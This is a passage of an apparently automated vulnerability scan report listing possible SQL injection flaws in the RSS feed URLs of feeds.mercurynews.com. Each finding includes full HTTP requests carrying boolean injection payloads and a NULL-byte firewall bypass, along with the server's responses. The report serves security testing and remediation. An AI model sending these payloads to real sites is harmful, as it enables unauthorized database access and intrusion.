X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 0
Connection: close


1.70. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:23 GMT
Content-Length: 0
Connection: close


1.71. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 11124167%20or%201%3d1--%20 and 11124167%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d1--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d2--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:27 GMT
Content-Length: 0
Connection: close


1.72. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200902.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200902.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11517556'%20or%201%3d1--%20 and 11517556'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d1--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:44 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d2--%20/568/200902.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.73. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200906.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200906.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200906.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 0
Connection: close


1.74. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 31633381'%20or%201%3d1--%20 and 31633381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi31633381'%20or%201%3d1--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:10 GMT
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi31633381'%20or%201%3d2--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.75. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200907.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200907.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:20 GMT
Content-Length: 0
Connection: close


1.76. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200908.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200908.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200908.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:39 GMT
Content-Length: 0
Connection: close


1.77. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200909.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200909.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200909.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close


1.78. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200910.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200910.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:06 GMT
Date: Tue, 07 Dec 2010 23:21:06 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.79. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16915327'%20or%201%3d1--%20 and 16915327'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16915327'%20or%201%3d1--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16915327'%20or%201%3d2--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:06 GMT
Date: Tue, 07 Dec 2010 23:22:06 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.80. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200911.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18682428'%20or%201%3d1--%20 and 18682428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d1--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
